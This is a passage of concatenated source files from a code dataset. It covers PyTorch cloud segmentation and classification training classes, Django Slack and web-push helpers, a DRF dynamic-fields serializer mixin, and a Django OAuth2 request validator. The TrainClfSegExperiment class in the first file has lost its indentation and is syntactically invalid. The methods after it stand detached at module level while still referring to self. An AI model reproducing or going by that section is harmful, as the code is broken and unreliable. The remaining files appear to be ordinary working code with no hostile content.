                          EarlyStoppingCallback(**self.cb_params["earlystop"]),
                          AccuracyCallback(**self.cb_params["accuracy"]),
                          ]
        ckpoint_params = self.cb_params["checkpoint_params"]
        if ckpoint_params["checkpoint_path"] != None: # hacky way to say no checkpoint callback but eh what the heck
            mode = ckpoint_params["mode"].lower()
            if mode == "full":
                print("Stateful loading...")
                ckpoint_p = Path(ckpoint_params["checkpoint_path"])
                fname = ckpoint_p.name
                # everything in the path besides the base file name
                resume_dir = str(ckpoint_p.parents[0])
                print(f"Loading {fname} from {resume_dir}. \
                    \nCheckpoints will also be saved in {resume_dir}.")
                # adding the checkpoint callback
                callbacks_list = callbacks_list + [CheckpointCallback(resume=fname,
                                                                      resume_dir=resume_dir),]
            elif mode == "model_only":
                print("Loading weights into model...")
                # NOTE(review): `load_weights_train` is not imported/defined in the
                # visible module scope — this branch would raise NameError; confirm.
                self.model = load_weights_train(ckpoint_params["checkpoint_path"], self.model)
        return callbacks_list
class TrainClassificationExperiment(TrainExperiment):
    """
    Stores the main parts of a classification experiment:
    - df split
    - datasets
    - loaders
    - model
    - optimizer
    - lr_scheduler
    - criterion
    - callbacks
    """
    def __init__(self, config: dict):
        """
        Args:
            config (dict): from `train_classification_yaml.py`
        """
        super().__init__(config=config)
    def get_datasets(self, train_ids, valid_ids):
        """
        Creates and returns the train and validation datasets.
        """
        # preparing transforms (encoder-specific ImageNet normalization)
        preprocessing_fn = smp.encoders.get_preprocessing_fn(self.model_params["encoder"],
                                                             "imagenet")
        preprocessing_transform = get_preprocessing(preprocessing_fn)
        train_aug = get_training_augmentation(self.io_params["aug_key"])
        val_aug = get_validation_augmentation(self.io_params["aug_key"])
        # creating the datasets
        train_dataset = ClassificationCloudDataset(self.io_params["image_folder"],
                                                   df=self.df,
                                                   im_ids=train_ids,
                                                   transforms=train_aug,
                                                   preprocessing=preprocessing_transform)
        valid_dataset = ClassificationCloudDataset(self.io_params["image_folder"],
                                                   df=self.df,
                                                   im_ids=valid_ids,
                                                   transforms=val_aug,
                                                   preprocessing=preprocessing_transform)
        return (train_dataset, valid_dataset)
    def get_model(self):
        """Creates the 4-class pretrained classifier (no output activation)."""
        # setting up the classification model
        model = Pretrained(variant=self.model_params["encoder"], num_classes=4,
                           pretrained=True, activation=None)
        return model
class TrainSegExperiment(TrainExperiment):
    """
    Stores the main parts of a segmentation experiment:
    - df split
    - datasets
    - loaders
    - model
    - optimizer
    - lr_scheduler
    - criterion
    - callbacks
    Note: There is no model_name for this experiment. There is `encoder` and
    `decoder` under `model_params`. You can also specify the attention_type
    """
    def __init__(self, config: dict):
        """
        Args:
            config (dict): from `train_seg_yaml.py`
        """
        super().__init__(config=config)
    def get_datasets(self, train_ids, valid_ids):
        """
        Creates and returns the train and validation datasets.
        """
        # preparing transforms (encoder-specific ImageNet normalization)
        encoder = self.model_params["encoder"]
        preprocessing_fn = smp.encoders.get_preprocessing_fn(encoder,
                                                             "imagenet")
        preprocessing_transform = get_preprocessing(preprocessing_fn)
        train_aug = get_training_augmentation(self.io_params["aug_key"])
        val_aug = get_validation_augmentation(self.io_params["aug_key"])
        # creating the datasets
        train_dataset = CloudDataset(self.io_params["image_folder"],
                                     df=self.df,
                                     im_ids=train_ids,
                                     masks_folder=self.io_params["masks_folder"],
                                     transforms=train_aug,
                                     preprocessing=preprocessing_transform,
                                     mask_shape=self.io_params["mask_shape"])
        valid_dataset = CloudDataset(self.io_params["image_folder"],
                                     df=self.df,
                                     im_ids=valid_ids,
                                     masks_folder=self.io_params["masks_folder"],
                                     transforms=val_aug,
                                     preprocessing=preprocessing_transform,
                                     mask_shape=self.io_params["mask_shape"])
        return (train_dataset, valid_dataset)
    def get_model(self):
        """Creates the smp Unet/FPN segmentation model (4 classes, no activation)."""
        encoder = self.model_params["encoder"].lower()
        decoder = self.model_params["decoder"].lower()
        print(f"\nEncoder: {encoder}, Decoder: {decoder}")
        # setting up the seg model
        assert decoder in ["unet", "fpn"], \
            "`decoder` must be one of ['unet', 'fpn']"
        if decoder == "unet":
            model = smp.Unet(encoder_name=encoder, encoder_weights="imagenet",
                             classes=4, activation=None,
                             **self.model_params[decoder])
        elif decoder == "fpn":
            model = smp.FPN(encoder_name=encoder, encoder_weights="imagenet",
                            classes=4, activation=None,
                            **self.model_params[decoder])
        # calculating # of parameters
        total = sum(p.numel() for p in model.parameters())
        trainable = sum(p.numel() for p in model.parameters() if p.requires_grad)
        print(f"Total # of Params: {total}\nTrainable params: {trainable}")
        return model
class TrainClfSegExperiment(TrainExperiment):
"""
Stores the main parts of a classification + segmentation experiment:
- df split
- datasets
- loaders
- model
- optimizer
- lr_scheduler
- criterion
- callbacks
Note: There is no model_name for this experiment. There is `encoder` and
`decoder` under `model_params`. You can also specify the attention_type
"""
def __init__(self, config: dict):
"""
Args:
config (dict): from `train_seg_yaml.py`
"""
self.model_params = config["model_params"]
super().__init__(config=config)
def get_datasets(self, train_ids, valid_ids):
"""
Creates and returns the train and validation datasets.
"""
# preparing transforms
encoder = self.model_params["encoder"]
preprocessing_fn = smp.encoders.get_preprocessing_fn(encoder,
"imagenet")
preprocessing_transform = get_preprocessing(preprocessing_fn)
train_aug = get_training_augmentation(self.io_params["aug_key"])
val_aug = get_validation_augmentation(self.io_params["aug_key"])
# creating the datasets
train_dataset = ClfSegCloudDataset(self.io_params["image_folder"],
df=self.df,
im_ids=train_ids,
masks_folder=self.io_params["masks_folder"],
transforms=train_aug,
preprocessing=preprocessing_transform,
mask_shape=self.io_params["mask_shape"])
valid_dataset = ClfSegCloudDataset(self.io_params["image_folder"],
df=self.df,
im_ids=valid_ids,
masks_folder=self.io_params["masks_folder"],
transforms=val_aug,
preprocessing=preprocessing_transform,
mask_shape=self.io_params["mask_shape"])
return (train_dataset, valid_dataset)
def get_model(self):
encoder = self.model_params["encoder"].lower()
decoder = self.model_params["decoder"].lower()
print(f"\nEncoder: {encoder}, Decoder: {decoder}")
assert encoder == "resnet34" and decoder == "fpn", \
"Currently only ResNet34FPN is supported for CLF+Seg."
model = ResNet34FPN(num_classes=4, fp16=self.config["fp16"])
# calculating # of parameters
total = sum(p.numel() for p in model.parameters())
trainable = sum(p.numel() for p in model.parameters() if p.requires_grad)
print(f"Total # of Params: {total}\nTrainable params: {trainable}")
return model
def get_criterion(self):
    """
    Build the criterion dict for the segmentation and classification heads.

    Returns:
        dict: {loss_name: loss_instance} with one entry per head (a single
        entry if both heads use the same loss name).
    """
    loss_dict = {
        "bce_dice_loss": BCEDiceLoss(activation="sigmoid"),
        "bce": torch.nn.BCEWithLogitsLoss(),
        "bce_no_logits": torch.nn.BCELoss(),
        "focal_loss": FocalLoss(logits=False),
        "heng_focal_loss": HengFocalLoss(),
    }
    seg_loss_name = self.criterion_params["seg_loss"].lower()
    clf_loss_name = self.criterion_params["clf_loss"].lower()
    seg_loss = loss_dict[seg_loss_name]
    clf_loss = loss_dict[clf_loss_name]
    # Re-initialize a criterion only when explicit kwargs are configured.
    # The previous unconditional `loss.__init__(**{})` reset a loss to its
    # class defaults, clobbering presets such as activation="sigmoid" above.
    seg_kwargs = self.criterion_params.get(seg_loss_name)
    if seg_kwargs:
        seg_loss.__init__(**seg_kwargs)
    clf_kwargs = self.criterion_params.get(clf_loss_name)
    if clf_kwargs:
        clf_loss.__init__(**clf_kwargs)
    criterion_dict = {seg_loss_name: seg_loss,
                      clf_loss_name: clf_loss}
    print(f"Criterion: {criterion_dict}")
    return criterion_dict
def get_callbacks(self):
    """
    Assemble the catalyst callbacks: one CriterionCallback per head, a loss
    aggregator, early stopping, and (optionally) checkpoint resumption.

    Returns:
        list: catalyst callbacks for the runner.
    """
    from catalyst.dl.callbacks import CriterionAggregatorCallback, \
        CriterionCallback
    seg_loss_name = self.criterion_params["seg_loss"].lower()
    clf_loss_name = self.criterion_params["clf_loss"].lower()
    callbacks_list = [
        CriterionCallback(prefix="seg_loss",
                          input_key="seg_targets",
                          output_key="seg_logits",
                          criterion_key=seg_loss_name),
        CriterionCallback(prefix="clf_loss",
                          input_key="clf_targets",
                          output_key="clf_logits",
                          criterion_key=clf_loss_name),
        CriterionAggregatorCallback(prefix="loss",
                                    loss_keys=["seg_loss", "clf_loss"]),
        EarlyStoppingCallback(**self.cb_params["earlystop"]),
    ]
    ckpoint_params = self.cb_params["checkpoint_params"]
    # A null checkpoint_path in the config means "no checkpoint loading".
    if ckpoint_params["checkpoint_path"] is not None:
        mode = ckpoint_params["mode"].lower()
        if mode == "full":
            # resume full training state (weights + optimizer + scheduler)
            print("Stateful loading...")
            ckpoint_p = Path(ckpoint_params["checkpoint_path"])
            fname = ckpoint_p.name
            # everything in the path besides the base file name
            resume_dir = str(ckpoint_p.parent)
            print(f"Loading {fname} from {resume_dir}. \
\nCheckpoints will also be saved in {resume_dir}.")
            # adding the checkpoint callback
            callbacks_list.append(CheckpointCallback(resume=fname,
                                                     resume_dir=resume_dir))
        elif mode == "model_only":
            # only load the weights; the optimizer/scheduler start fresh
            print("Loading weights into model...")
            self.model = load_weights_train(ckpoint_params["checkpoint_path"],
                                            self.model)
    print(f"Callbacks: {callbacks_list}")
    return callbacks_list
def load_weights_train(checkpoint_path, model):
    """
    Loads weights from a checkpoint into `model` and puts it in train() mode.

    Supports both catalyst-style checkpoints (a dict wrapping the weights
    under "model_state_dict") and plain state-dict files.

    Args:
        checkpoint_path (str): path to a .pt or .pth checkpoint
        model (torch.nn.Module): model to load the weights into
    Returns:
        torch.nn.Module: `model` with loaded weights and in train() mode
    """
    # Load once (the old code re-read the file inside a bare `except:`,
    # which also swallowed KeyboardInterrupt and masked real load errors).
    checkpoint = torch.load(checkpoint_path, map_location="cpu")
    try:
        # catalyst checkpoints wrap the weights
        state_dict = checkpoint["model_state_dict"]
    except (KeyError, TypeError):
        # anything else: the checkpoint IS the state dict
        state_dict = checkpoint
    model.load_state_dict(state_dict, strict=True)
    model.train()
    return model
| StarcoderdataPython |
103353 | <filename>webmap/utils.py
import requests
from django.conf import settings
from django.forms.models import model_to_dict
import os
from pywebpush import WebPusher
def send_slack_log(title, message):
    """Post `message` to Slack under `title` if a webhook URL is configured.

    The SLACK_URL environment variable wins; otherwise the Django setting
    SLACK_URL is used. A no-op when neither is set.
    """
    webhook = os.getenv('SLACK_URL')
    if not webhook and hasattr(settings, 'SLACK_URL') and settings.SLACK_URL:
        webhook = settings.SLACK_URL
    if not webhook:
        return
    requests.post(webhook, json={"text": message, "username": title})
def send_push_notification(subscription, payload, ttl):
    """Send a web-push notification to a subscription.

    Args:
        subscription: subscription model instance (endpoint + keys)
        payload: data to push
        ttl: time-to-live for the push message
    Returns:
        The pywebpush response object.
    """
    subscription_data = _process_subscription_info(subscription)
    # GCM key: environment variable wins; otherwise fall back to the
    # WEBPUSH_SETTINGS dict in Django settings. The old code tested
    # `settings.GCM_KEY` (a different, possibly missing attribute that could
    # raise AttributeError) while reading WEBPUSH_SETTINGS — guard with
    # hasattr, mirroring send_slack_log.
    gcm_key = os.getenv('GCM_KEY')
    if not gcm_key and hasattr(settings, 'WEBPUSH_SETTINGS') and settings.WEBPUSH_SETTINGS:
        gcm_key = settings.WEBPUSH_SETTINGS.get('GCM_KEY')
    req = WebPusher(subscription_data).send(data=payload, ttl=ttl, gcm_key=gcm_key)
    return req
def _process_subscription_info(subscription):
    """Convert a subscription model instance into the dict pywebpush expects:
    {"endpoint": ..., "keys": {"p256dh": ..., "auth": ...}}.
    """
    data = model_to_dict(subscription, exclude=["browser", "id"])
    return {
        "endpoint": data.pop("endpoint"),
        "keys": {"p256dh": data.pop("p256dh"), "auth": data.pop("auth")},
    }
| StarcoderdataPython |
3322886 | <reponame>csdenboer/drf-dynamic-serializers<filename>drf_dynamic_serializers/mixins.py
from collections import defaultdict
from typing import Callable, List, Tuple, Set
from django.utils.functional import cached_property
from rest_framework.serializers import ListSerializer, Serializer
from rest_framework.request import Request
from .conf import DynamicFieldsConfig, settings
from .exceptions import SerializerDoesNotSupportDynamicFields
# Public API of this module.
__all__ = (
    "DynamicFieldsPolymorphicSerializerMixin",
    "DynamicFieldsSerializerMixin",
    "DynamicFieldsViewMixin",
)
class DynamicFieldsPolymorphicSerializerMixin:
    """
    Mixin that implements dynamic fields for PolymorphicSerializers (see
    https://github.com/apirobot/django-rest-polymorphic).
    """

    # marker checked via getattr(..., "dynamic_fields", False) by callers
    dynamic_fields = True
    _df_config: DynamicFieldsConfig
    # provided by the PolymorphicSerializer base — TODO confirm
    to_resource_type: Callable

    def __init__(self, *args, **kwargs):
        # popup df related arguments, so that we will not get unexpected arguments error
        self._df_conf = DynamicFieldsConfig(
            included_fields=kwargs.pop("included_fields", None),
            excluded_fields=kwargs.pop("excluded_fields", None),
            required_fields=kwargs.pop("required_fields", None),
            non_nullable_fields=kwargs.pop("non_nullable_fields", None),
        )
        super().__init__(*args, **kwargs)
        # Rebuild the model -> serializer mapping, instantiating any
        # serializer classes and forwarding the df config to the ones that
        # support dynamic fields.
        model_serializer_mapping = self.model_serializer_mapping
        self.model_serializer_mapping = {}
        self.resource_type_model_mapping = {}
        for model, serializer in model_serializer_mapping.items():
            resource_type = self.to_resource_type(model)
            if callable(serializer):
                is_dynamic_fields_serializer = getattr(
                    serializer, "dynamic_fields", False
                )
                # pass df config to initialization of serializer
                serializer = serializer(
                    *args,
                    **(
                        {**kwargs, **self._df_conf.__dict__}
                        if is_dynamic_fields_serializer
                        else kwargs
                    )
                )
                serializer.parent = self
            self.resource_type_model_mapping[resource_type] = model
            self.model_serializer_mapping[model] = serializer

    def set_df_config(self, config: DynamicFieldsConfig) -> None:
        """
        Set config 'config' as dynamic fields config.
        """
        # loop over all serializers in this polymorphic's serializer and set config 'config' as dynamic fields config
        for model, serializer in self.model_serializer_mapping.items():
            if getattr(serializer, "dynamic_fields", False):
                serializer.set_df_config(config)
class DynamicFieldsSerializerMixin:
    """
    Mixin that adds the ability to dynamically configure a serializer's fields. Fields can be included and/or excluded
    and the 'required' and 'allow_null' properties of fields can be overridden.
    """

    # marker checked via getattr(..., "dynamic_fields", False) by callers
    dynamic_fields = True
    # NOTE(review): the attribute actually set/read throughout the class is
    # ``_df_conf`` (the original annotation said ``_df_config``).
    _df_conf: "DynamicFieldsConfig"

    def __init__(self, *args, **kwargs):
        # Pop df-related kwargs so the underlying serializer does not receive
        # unexpected keyword arguments.
        self._df_conf = DynamicFieldsConfig(
            included_fields=kwargs.pop("included_fields", None),
            excluded_fields=kwargs.pop("excluded_fields", None),
            required_fields=kwargs.pop("required_fields", None),
            non_nullable_fields=kwargs.pop("non_nullable_fields", None),
        )
        super().__init__(*args, **kwargs)

    @cached_property
    def fields(self) -> dict:
        """
        Get fields to serialize given the fields to include and fields to exclude.
        """
        fields = super(DynamicFieldsSerializerMixin, self).fields
        included_fields_root, included_fields_nested = self._split_levels(
            self._df_conf.included_fields or []
        )
        excluded_fields_root, excluded_fields_nested = self._split_levels(
            self._df_conf.excluded_fields or []
        )
        # if there are fields to clean
        if len(included_fields_root) != 0 or len(excluded_fields_root) != 0:
            self._clean_fields(
                fields,
                excluded_fields_root,
                included_fields_root,
                excluded_fields_nested,
            )
        # pass included and excluded fields to fields (used by nested serializers).
        for name, field in fields.items():
            self._set_df_conf_for_field(
                field,
                DynamicFieldsConfig(
                    included_fields=included_fields_nested.get(name, None),
                    excluded_fields=excluded_fields_nested.get(name, None),
                ),
            )
            # set dynamic properties, e.g. allow_null and required
            self._apply_dynamic_properties_for_field(fields, name)
        return fields

    def set_df_config(self, config: "DynamicFieldsConfig"):
        """
        Set config 'config' as dynamic fields config.
        """
        self._df_conf = config

    def _apply_dynamic_properties_for_field(self, fields, field_name) -> None:
        """
        Set dynamic properties to field with name 'field_name' in fields 'fields'.
        """
        # if we want to overwrite the 'required' property of the fields
        if self._df_conf.required_fields is not None:
            fields[field_name].required = field_name in self._df_conf.required_fields
        # if we want to overwrite the 'allow_null' property of the fields
        if self._df_conf.non_nullable_fields is not None:
            fields[field_name].allow_null = (
                field_name not in self._df_conf.non_nullable_fields
            )

    def _clean_fields(
        self,
        fields: dict,
        excluded_fields_root: Set[str],
        included_fields_root: Set[str],
        excluded_fields_nested: dict,
    ) -> None:
        """
        Clean fields 'fields' given excluded fields 'excluded_fields_root', included fields 'included_fields_root' and
        nested excluded fields 'excluded_fields_nested'.
        """
        to_remove = []
        for field_name in fields:
            is_included = self._is_field_included(
                field_name,
                excluded_fields_root,
                included_fields_root,
                excluded_fields_nested,
            )
            if not is_included:
                # we cannot pop while iterating
                to_remove.append(field_name)
        for remove_field in to_remove:
            fields.pop(remove_field)

    @staticmethod
    def _is_field_included(
        field_name: str,
        excluded_fields: Set[str],
        included_fields: Set[str],
        nested_excluded_fields: dict,
    ) -> bool:
        """
        Check whether field with name 'field_name' should exist (be serialized) given excluded fields
        'excluded_fields', included fields 'included_fields' and nested excluded fields
        'nested_excluded_fields'.
        """
        # We don't want to prematurely exclude a field, eg "exclude=house.rooms.kitchen" should not exclude the entire
        # house or all the rooms, just the kitchen.
        if field_name in excluded_fields and field_name not in nested_excluded_fields:
            return False
        # if included fields are set (filtering is enabled) and field is not in included_fields, then return False
        if len(included_fields) > 0 and field_name not in included_fields:
            return False
        return True

    @staticmethod
    def _split_levels(fields: List[str]) -> Tuple[set, defaultdict]:
        """
        Convert nested fields into current-level fields and next level fields.
        """
        first_level_fields = set()
        next_level_fields = defaultdict(list)
        for e in fields:
            if "." in e:
                # split on first .
                first_level, next_level = e.split(".", 1)
                first_level_fields.add(first_level)
                next_level_fields[first_level].append(next_level)
            else:
                first_level_fields.add(e)
        return first_level_fields, next_level_fields

    @staticmethod
    def _set_df_conf_for_field(field, df_config: "DynamicFieldsConfig") -> None:
        """
        Set dynamic fields config 'df_config' on field 'field' (or its child,
        for list serializers).
        """
        # if field has support for dynamic fields, then set df config
        if getattr(field, "dynamic_fields", False):
            field.set_df_config(df_config)
        # use isinstance (not type equality) so ListSerializer SUBCLASSES —
        # e.g. the list serializer DRF builds for many=True — are handled too
        elif isinstance(field, ListSerializer) and getattr(
            field.child, "dynamic_fields", False
        ):
            field.child.set_df_config(df_config)
class DynamicFieldsViewMixin:
    """
    Mixin for view(set)s that adds the ability to dynamically select the fields to include or exclude in a response by
    reading the query parameters in the request.
    """

    default_included_fields: List[str]
    default_excluded_fields: List[str]
    request: Request
    get_serializer_class: Callable
    get_serializer_context: Callable

    def get_serializer(self, *args, **kwargs) -> Serializer:
        """
        Build the serializer, injecting the dynamically selected
        included/excluded fields for eligible (GET) requests.
        """
        serializer_class = self.get_serializer_class()
        if getattr(serializer_class, "dynamic_fields", False) is False:
            raise SerializerDoesNotSupportDynamicFields()
        kwargs["context"] = self.get_serializer_context()
        if self._is_eligible_for_dynamic_fields():
            kwargs["included_fields"] = self._get_included_fields()
            kwargs["excluded_fields"] = self._get_excluded_fields()
        return serializer_class(*args, **kwargs)

    def _get_included_fields(self) -> List[str]:
        """
        Names of the fields to include: query params win, view defaults otherwise.
        """
        from_query = self._parse_query_params_for_field(
            settings.DRF_DYNAMIC_SERIALIZERS_QUERY_PARAM_INCLUDED_FIELDS
        )
        if from_query:
            return from_query
        return self._get_default_included_fields()

    def _get_excluded_fields(self) -> List[str]:
        """
        Names of the fields to exclude: query params win, view defaults otherwise.
        """
        from_query = self._parse_query_params_for_field(
            settings.DRF_DYNAMIC_SERIALIZERS_QUERY_PARAM_EXCLUDED_FIELDS
        )
        if from_query:
            return from_query
        return self._get_default_excluded_fields()

    def _get_default_included_fields(self) -> List[str]:
        """
        Names of the fields to include by default (None if unset on the view).
        """
        return getattr(self, "default_included_fields", None)

    def _get_default_excluded_fields(self) -> List[str]:
        """
        Names of the fields to exclude by default (None if unset on the view).
        """
        return getattr(self, "default_excluded_fields", None)

    def _is_eligible_for_dynamic_fields(self) -> bool:
        """
        Verify whether the request is eligible for dynamic fields.
        Only plain GET requests qualify.
        """
        request = self.request
        return request is not None and request.method == "GET"

    def _parse_query_params_for_field(self, field: str) -> List[str]:
        """
        Parse the comma-separated query parameter 'field' into a list
        (None when the parameter is absent or empty).
        """
        raw = self.request.query_params.get(field)
        if not raw:
            return None
        return raw.split(",")
| StarcoderdataPython |
3358 | <reponame>anobi/django-oauth-api
import base64
import binascii
from datetime import timedelta
from django.contrib.auth import authenticate
from django.utils import timezone
from oauthlib.oauth2 import RequestValidator
from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication
from oauth_api.settings import oauth_api_settings
# Maps an incoming OAuth2 ``grant_type`` value to the application
# authorization grant types that may use it. 'refresh_token' is accepted
# for every grant type that can be issued a refresh token.
GRANT_TYPE_MAPPING = {
    'authorization_code': (AbstractApplication.GRANT_AUTHORIZATION_CODE,),
    'password': (AbstractApplication.GRANT_PASSWORD,),
    'client_credentials': (AbstractApplication.GRANT_CLIENT_CREDENTIALS,),
    'refresh_token': (AbstractApplication.GRANT_AUTHORIZATION_CODE, AbstractApplication.GRANT_PASSWORD,
                      AbstractApplication.GRANT_CLIENT_CREDENTIALS)
}
class OAuthValidator(RequestValidator):
    """
    oauthlib ``RequestValidator`` implementation backed by this package's
    Django models (Application, AccessToken, RefreshToken, AuthorizationCode).
    """

    def _get_application(self, client_id, request):
        """
        Load application instance for given client_id and store it in request as 'client' attribute
        """
        assert hasattr(request, 'client'), "'client' attribute missing from 'request'"
        Application = get_application_model()
        try:
            # reuse an application already attached to the request, if any
            request.client = request.client or Application.objects.get(client_id=client_id)
            return request.client
        except Application.DoesNotExist:
            return None

    def _get_auth_string(self, request):
        """
        Return the base64 payload of an HTTP Basic Authorization header,
        or None when the header is missing, malformed or not Basic auth.
        """
        auth = request.headers.get('HTTP_AUTHORIZATION', None)
        if not auth:
            return None
        splitted = auth.split(' ', 1)
        if len(splitted) != 2:
            return None
        auth_type, auth_string = splitted
        if auth_type != 'Basic':
            return None
        return auth_string

    def _authenticate_client_basic(self, request):
        """
        Try authenticating the client using HTTP Basic Authentication method
        """
        auth_string = self._get_auth_string(request)
        if not auth_string:
            return False
        try:
            encoding = request.encoding or 'utf-8'
        except AttributeError:
            encoding = 'utf-8'
        try:
            b64_decoded = base64.b64decode(auth_string)
        except (TypeError, binascii.Error):
            # not valid base64
            return False
        try:
            auth_string_decoded = b64_decoded.decode(encoding)
        except UnicodeDecodeError:
            return False
        client_id, client_secret = auth_string_decoded.split(':', 1)
        if self._get_application(client_id, request) is None:
            return False
        elif request.client.client_secret != client_secret:
            return False
        else:
            return True

    def _authenticate_client_body(self, request):
        """
        Try authenticating the client using values from request body
        """
        try:
            client_id = request.client_id
            client_secret = request.client_secret
        except AttributeError:
            return False
        if not client_id:
            return False
        if self._get_application(client_id, request) is None:
            return False
        elif request.client.client_secret != client_secret:
            return False
        else:
            return True

    def client_authentication_required(self, request, *args, **kwargs):
        """
        Determine if client authentication is required for current request.
        According to the rfc6749, client authentication is required in the following cases:
            - Resource Owner Password Credentials Grant, when Client type is Confidential or when
              Client was issued client credentials or whenever Client provided client
              authentication, see `Section 4.3.2`_.
            - Authorization Code Grant, when Client type is Confidential or when Client was issued
              client credentials or whenever Client provided client authentication,
              see `Section 4.1.3`_.
            - Refresh Token Grant, when Client type is Confidential or when Client was issued
              client credentials or whenever Client provided client authentication, see
              `Section 6`_

        :param request: oauthlib.common.Request
        :return: True or False
        """
        # client provided authentication via Basic header or body credentials
        if self._get_auth_string(request):
            return True
        try:
            if request.client_id and request.client_secret:
                return True
        except AttributeError:
            # Client id or secret not provided
            pass
        self._get_application(request.client_id, request)
        if request.client:
            return request.client.client_type == AbstractApplication.CLIENT_CONFIDENTIAL
        return super(OAuthValidator, self).client_authentication_required(request, *args, **kwargs)

    def authenticate_client(self, request, *args, **kwargs):
        """
        Try to authenticate the client.
        """
        # Basic auth first, then fall back to body credentials
        authenticated = self._authenticate_client_basic(request)
        if not authenticated:
            authenticated = self._authenticate_client_body(request)
        return authenticated

    def authenticate_client_id(self, client_id, request, *args, **kwargs):
        """
        Ensure client_id belong to a non-confidential client.
        A non-confidential client is one that is not required to authenticate through other means, such as using HTTP Basic.
        """
        if self._get_application(client_id, request) is not None:
            return request.client.client_type != AbstractApplication.CLIENT_CONFIDENTIAL
        return False

    def confirm_redirect_uri(self, client_id, code, redirect_uri, client, *args, **kwargs):
        """
        Ensure client is authorized to redirect to the redirect_uri requested.
        """
        auth_code = AuthorizationCode.objects.get(application=client, code=code)
        return auth_code.redirect_uri_allowed(redirect_uri)

    def get_default_redirect_uri(self, client_id, request, *args, **kwargs):
        """
        Get the default redirect URI for the client.
        """
        return request.client.default_redirect_uri

    def get_default_scopes(self, client_id, request, *args, **kwargs):
        """
        Get the default scopes for the client.
        """
        # all configured scopes are granted by default
        return list(oauth_api_settings.SCOPES.keys())

    def get_original_scopes(self, refresh_token, request, *args, **kwargs):
        """
        Get the list of scopes associated with the refresh token.
        """
        # relies on validate_refresh_token() having attached
        # refresh_token_object to the request earlier in the flow
        return request.refresh_token_object.access_token.scope

    def invalidate_authorization_code(self, client_id, code, request, *args, **kwargs):
        """
        Invalidate an authorization code after use.
        """
        auth_code = AuthorizationCode.objects.get(application=request.client, code=code)
        auth_code.delete()

    def save_authorization_code(self, client_id, code, request, *args, **kwargs):
        """
        Persist the authorization_code.
        """
        expires = timezone.now() + timedelta(seconds=oauth_api_settings.ACCESS_TOKEN_EXPIRATION)
        AuthorizationCode.objects.create(
            application=request.client,
            user=request.user,
            code=code['code'],
            expires=expires,
            redirect_uri=request.redirect_uri,
            scope=' '.join(request.scopes)
        )
        return request.redirect_uri

    def save_bearer_token(self, token, request, *args, **kwargs):
        """
        Persist the Bearer token.
        """
        if request.refresh_token:
            # Revoke Refresh Token (and related Access Token)
            try:
                RefreshToken.objects.get(token=request.refresh_token).revoke()
            except RefreshToken.DoesNotExist:
                # Already revoked?
                pass
        expires = timezone.now() + timedelta(seconds=oauth_api_settings.ACCESS_TOKEN_EXPIRATION)
        user = request.user
        if request.grant_type == 'client_credentials':
            # client credentials tokens are not bound to a user
            user = None
        access_token = AccessToken.objects.create(
            user=user,
            scope=token['scope'],
            expires=expires,
            token=token['access_token'],
            application=request.client
        )
        if 'refresh_token' in token:
            # refresh tokens may be configured to never expire (None)
            if oauth_api_settings.REFRESH_TOKEN_EXPIRATION is not None:
                expires = timezone.now() + timedelta(seconds=oauth_api_settings.REFRESH_TOKEN_EXPIRATION)
            else:
                expires = None
            RefreshToken.objects.create(
                user=request.user,
                token=token['refresh_token'],
                expires=expires,
                application=request.client,
                access_token=access_token
            )
        return request.client.default_redirect_uri

    def revoke_token(self, token, token_type_hint, request, *args, **kwargs):
        """
        Revoke an access or refresh token.

        :param token: The token string.
        :param token_type_hint: access_token or refresh_token.
        :param request: The HTTP Request (oauthlib.common.Request)
        """
        if token_type_hint not in ['access_token', 'refresh_token']:
            token_type_hint = None
        token_types = {
            'access_token': AccessToken,
            'refresh_token': RefreshToken,
        }
        token_type = token_types.get(token_type_hint, AccessToken)
        try:
            token_type.objects.get(token=token, application=request.client).revoke()
        except token_type.DoesNotExist:
            # Lookup from all token types except from already looked up type
            other_types = (_type for _type in token_types.values() if _type != token_type)
            for other_type in other_types:
                for token in other_type.objects.filter(token=token, application=request.client):
                    token.revoke()

    def validate_bearer_token(self, token, scopes, request):
        """
        Ensure the Bearer token is valid and authorized access to scopes.
        """
        if token is None:
            return False
        try:
            access_token = AccessToken.objects.select_related('application', 'user').get(token=token)
            if access_token.is_valid(scopes):
                request.client = access_token.application
                request.user = access_token.user
                request.scopes = scopes
                # Required when authenticating using OAuth2Authentication
                request.access_token = access_token
                return True
            return False
        except AccessToken.DoesNotExist:
            return False

    def validate_client_id(self, client_id, request, *args, **kwargs):
        """
        Check that and Application exists with given client_id.
        """
        return self._get_application(client_id, request) is not None

    def validate_code(self, client_id, code, client, request, *args, **kwargs):
        """
        Ensure the authorization_code is valid and assigned to client.
        """
        try:
            auth_code = AuthorizationCode.objects.select_related('user').get(application=client, code=code)
            if not auth_code.is_expired:
                request.scopes = auth_code.scope.split(' ')
                request.user = auth_code.user
                return True
            return False
        except AuthorizationCode.DoesNotExist:
            return False

    def validate_grant_type(self, client_id, grant_type, client, request, *args, **kwargs):
        """
        Ensure client is authorized to use the grant_type requested.
        """
        assert (grant_type in GRANT_TYPE_MAPPING)
        return request.client.authorization_grant_type in GRANT_TYPE_MAPPING[grant_type]

    def validate_redirect_uri(self, client_id, redirect_uri, request, *args, **kwargs):
        """
        Ensure client is authorized to redirect to the redirect_uri requested.
        """
        return request.client.redirect_uri_allowed(redirect_uri)

    def validate_refresh_token(self, refresh_token, client, request, *args, **kwargs):
        """
        Ensure the Bearer token is valid and authorized access to scopes.
        """
        try:
            rt = RefreshToken.objects.select_related('user').get(token=refresh_token)
            if not rt.is_expired:
                request.user = rt.user
                request.refresh_token = rt.token
                # stored for get_original_scopes() later in the flow
                request.refresh_token_object = rt
                return rt.application == client
            return False
        except RefreshToken.DoesNotExist:
            return False

    def validate_response_type(self, client_id, response_type, client, request, *args, **kwargs):
        """
        Ensure client is authorized to use the response_type requested.
        Authorization Endpoint Response Types registry is not supported.
        See http://tools.ietf.org/html/rfc6749#section-8.4
        """
        if response_type == 'code':
            return client.authorization_grant_type == AbstractApplication.GRANT_AUTHORIZATION_CODE
        elif response_type == 'token':
            return client.authorization_grant_type == AbstractApplication.GRANT_IMPLICIT
        else:
            return False

    def validate_scopes(self, client_id, scopes, client, request, *args, **kwargs):
        """
        Ensure the client is authorized access to requested scopes.
        """
        return set(scopes).issubset(set(oauth_api_settings.SCOPES.keys()))

    def validate_user(self, username, password, client, request, *args, **kwargs):
        """
        Ensure the username and password is valid.
        """
        user = authenticate(username=username, password=password)
        if user is not None and user.is_active:
            request.user = user
            return True
        return False
